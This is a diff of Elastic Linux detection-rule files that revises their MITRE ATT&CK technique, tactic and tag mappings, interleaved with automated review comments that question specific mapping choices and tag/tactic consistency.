@@ -193,19 +201,19 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -221,9 +229,10 @@ name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_systemd_shell_execution.toml b/rules/linux/persistence_systemd_shell_execution.toml index 2c91b1b2964..634b59f4e98 100644 --- a/rules/linux/persistence_systemd_shell_execution.toml +++ b/rules/linux/persistence_systemd_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
@@ -78,7 +78,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -91,19 +99,19 @@ process.parent.command_line == "/sbin/init" and process.args_count >= 2 framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -119,6 +127,6 @@ name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/linux/persistence_tainted_kernel_module_load.toml b/rules/linux/persistence_tainted_kernel_module_load.toml index 39f39886aa1..367963adfec 100644 --- a/rules/linux/persistence_tainted_kernel_module_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/23" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -75,7 +75,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" query = ''' @@ -105,16 +112,11 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
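Review bot: The Defense Evasion entry swaps `T1547.006` Kernel Modules and Extensions for `T1014` Rootkit, but a tainted kernel module load covers any unsigned or out-of-tree module, not only rootkits, so the mapping is broader than the detection while the precise technique is dropped from this entry (it presumably remains under Persistence above, which is outside the hunk). If the rootkit use case is what the tactic change documents, keep `T1547.006` alongside `T1014` rather than replacing it. persistence_tainted_kernel_module_out_of_tree_load.toml adds the same `T1014` entry and can be treated the same way.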
diff --git a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml index 423e1b87ade..b1e5e98060a 100644 --- a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -76,7 +76,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -102,3 +109,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_udev_rule_creation.toml b/rules/linux/persistence_udev_rule_creation.toml index d4279c8b34f..b58e6b0f925 100644 --- a/rules/linux/persistence_udev_rule_creation.toml +++ b/rules/linux/persistence_udev_rule_creation.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -128,16 +128,16 @@ file.path like ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.017" -name = "Udev Rules" -reference = "https://attack.mitre.org/techniques/T1546/017/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml index 87713a3d441..6d45ba99f78 100644 --- a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml +++ b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
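Review bot: The `T1546.017` Udev Rules subtechnique is removed even though it is the most specific ATT&CK mapping for a udev-rule-creation detection, leaving only the parent `T1546`; keep `[[rule.threat.technique.subtechnique]]` with `id = "T1546.017"` under `T1546`. The added `T1037` Boot or Logon Initialization Scripts has no obvious link to udev rules from what is in the hunk, so a line in the description explaining the intended overlap would help reviewers. The rule's query is outside the hunk.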
@@ -112,7 +112,43 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_unusual_exim4_child_process.toml b/rules/linux/persistence_unusual_exim4_child_process.toml index 74a2dd1de26..1b804697747 100644 --- a/rules/linux/persistence_unusual_exim4_child_process.toml +++ b/rules/linux/persistence_unusual_exim4_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
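Review bot: The new Execution (`TA0002`) and Defense Evasion (`TA0005`) entries come with no change to this rule's `tags` — the only other hunk for persistence_unpack_initramfs_via_unmkinitramfs.toml is the `updated_date` line — so unless the tag list already contains `Tactic: Execution` and `Tactic: Defense Evasion`, the tag/tactic pairing that the rest of this patch maintains is broken here. The Defense Evasion entry also names no technique. Confirm the tag list at the top of the file.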
@@ -58,7 +58,14 @@ references = [ risk_score = 21 rule_id = "6eb862bb-013d-4d4f-a14b-341433ca1a1f" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -73,27 +80,20 @@ not process.name:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_unusual_pam_grantor.toml b/rules/linux/persistence_unusual_pam_grantor.toml index 3cc6949feda..962c7bb3a3f 100644 --- a/rules/linux/persistence_unusual_pam_grantor.toml +++ b/rules/linux/persistence_unusual_pam_grantor.toml 
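Review bot: `T1037` Boot or Logon Initialization Scripts is an unexpected mapping for a rule on unusual exim4 child processes, which are spawned by a running mail daemon rather than a boot or logon script; `T1554` Compromise Host Software Binary fits, and the removed `T1190` Exploit Public-Facing Application was arguably the closer match for an internet-facing MTA. If narrowing the tags to Persistence only is intended, say why in the description; otherwise keep `T1190` under Initial Access as well. The added blank line before `[rule.new_terms]` doubles the separator.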
@@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ Add Auditd Manager For this detection rule to trigger, no additional configuration is required. """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Auditd Manager", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Auditd Manager", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -77,19 +85,14 @@ auditd.data.grantors:(* and not (pam_rootok or *pam_cap* or *pam_permit*)) framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" 
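Review bot: Both threat entries drop the `T1556.003` Pluggable Authentication Modules subtechnique although the query keys on `auditd.data.grantors`, i.e. PAM modules, which makes `T1556.003` the exact technique; keep it under `T1556` in the Credential Access entry (the next hunk of this file removes it there too). Mapping the Persistence entry to `T1543` Create or Modify System Process is also a stretch for a PAM grantor, since a PAM module is not a system service; `T1556.003` under Persistence, which ATT&CK also lists for that subtechnique, would describe the rule more accurately.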
@@ -99,15 +102,11 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = ["auditd.data.grantors"] diff --git a/rules/linux/persistence_unusual_sshd_child_process.toml b/rules/linux/persistence_unusual_sshd_child_process.toml index 92d8b579227..9acdc41ffa3 100644 --- a/rules/linux/persistence_unusual_sshd_child_process.toml +++ b/rules/linux/persistence_unusual_sshd_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -53,7 +53,15 @@ references = ["https://hadess.io/the-art-of-linux-persistence/"] risk_score = 21 rule_id = "4c3c6c47-e38f-4944-be27-5c80be973bd7" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
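Review bot: The rewritten `tags` for persistence_unusual_sshd_child_process.toml keep only `Tactic: Persistence`, but the threat section in the next hunks still has a Lateral Movement entry (`TA0008`) and gains a Command and Control entry (`TA0011`); `Tactic: Lateral Movement` is dropped and `Tactic: Command and Control` never added, so the tag list and the mapping disagree. Add `"Tactic: Lateral Movement",` and `"Tactic: Command and Control",` (or remove the corresponding entries), which is what this patch does for every other file.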
@@ -69,6 +77,24 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -79,6 +105,16 @@ id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -87,15 +123,11 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_user_or_group_creation_or_modification.toml b/rules/linux/persistence_user_or_group_creation_or_modification.toml index 9464079f355..989aedbc3a6 100644 --- a/rules/linux/persistence_user_or_group_creation_or_modification.toml +++ b/rules/linux/persistence_user_or_group_creation_or_modification.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/06/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -110,16 +110,6 @@ event.action in ("changed-password", "added-user-account", "added-group-account- [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_web_server_sus_child_spawned.toml b/rules/linux/persistence_web_server_sus_child_spawned.toml index e1fcf81978d..9bf48a74d57 100644 --- a/rules/linux/persistence_web_server_sus_child_spawned.toml +++ b/rules/linux/persistence_web_server_sus_child_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -82,7 +82,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' 
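Review bot: Removing `T1098.007` Additional Local or Domain Groups leaves the group-related half of the query unmapped: the hunk header shows the rule matches `added-group-account-` events, yet the only technique still visible in this entry is `T1136` Create Account, which covers accounts rather than group membership. Keep `T1098` / `T1098.007` alongside `T1136`, or narrow the query if group changes are no longer in scope. The rest of the threat section is outside the hunk, so another entry may already cover it.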
@@ -184,6 +193,24 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -203,16 +230,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_web_server_sus_command_execution.toml b/rules/linux/persistence_web_server_sus_command_execution.toml index f18d9334015..bd1fd7cbd10 100644 --- a/rules/linux/persistence_web_server_sus_command_execution.toml +++ b/rules/linux/persistence_web_server_sus_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] 
@@ -89,7 +89,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -169,6 +178,24 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -183,3 +210,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" 
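Review bot: As in the sibling child-spawned rule, the T1071 / TA0011 entry appended by the `@@ -183,3 +210,16 @@` hunk attaches a Command and Control tactic to an ESQL rule that reads only `logs-endpoint.events.process-*`, so the mapping is not backed by anything the query inspects. Consider `T1071.001` Web Protocols if the tactic is meant to capture web-shell traffic, or remove the entry and the matching `"Tactic: Command and Control"` tag introduced in the `@@ -89,7 +89,16 @@` hunk. The rewritten tags list is otherwise consistent with the three tactics the threat array now declares.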
diff --git a/rules/linux/persistence_web_server_sus_destination_port.toml b/rules/linux/persistence_web_server_sus_destination_port.toml index 9927329fab5..1c274eb2f45 100644 --- a/rules/linux/persistence_web_server_sus_destination_port.toml +++ b/rules/linux/persistence_web_server_sus_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -80,7 +80,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -105,12 +114,48 @@ not cidrmatch(destination.ip, "127.0.0.0/8", "::1","FE80::/10", "FF00::/8", "10. [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Persistence" +id = "TA0003" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat.technique]] -id = "T1571" -name = "Non-Standard Port" -reference = "https://attack.mitre.org/techniques/T1571/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0011" name = "Command and Control" +id = "TA0011" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/linux/persistence_web_server_unusual_command_execution.toml b/rules/linux/persistence_web_server_unusual_command_execution.toml index 3b19de7ec1c..e8c298819bd 100644 --- a/rules/linux/persistence_web_server_unusual_command_execution.toml +++ b/rules/linux/persistence_web_server_unusual_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] 
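Review bot: The `@@ -105,12 +114,48 @@` hunk deletes T1571 Non-Standard Port, the one technique that describes what the rule actually keys on (a destination port, per the filename and the `destination.ip` header context), and replaces it with T1505.003 / T1059.004 / T1071, which name the assumed cause rather than the observation; keep T1571 under the Command and Control entry alongside T1071. The new blocks are also serialized differently from the rest of this patch: `[rule.threat.tactic]` precedes `[[rule.threat.technique]]` and keys appear as `name = "Persistence"` before `id = "TA0003"`, whereas every other file here uses technique-then-tactic and `id`, `name`, `reference` order. Running the file through the repository's normal TOML serializer before commit would remove that drift.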
@@ -51,7 +51,15 @@ This rule detects shells invoked by web server processes on Linux to run one-off risk_score = 47 rule_id = "65f28c4d-cfc8-4847-9cca-f2fb1e319151" severity = "medium" -tags = ["Domain: Endpoint", "Domain: Web", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Web", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -89,6 +97,24 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
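Review bot: The rewritten `tags` list in the `@@ -51,7 +51,15 @@` hunk drops `"Tactic: Execution"` even though the T1059 entry kept as context in the `@@ -89,6 +97,24 @@` hunk still belongs to a TA0002 Execution entry (those lines are untouched by any hunk), and the next hunk for this file adds a TA0011 entry; tags and the threat array now disagree on two tactics. The list should read `"Tactic: Persistence", "Tactic: Execution", "Tactic: Command and Control"` — or the extra threat entries should go — so that tactic tags mirror `rule.threat` exactly. The `rule.threat` array for this rule continues past this hunk.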
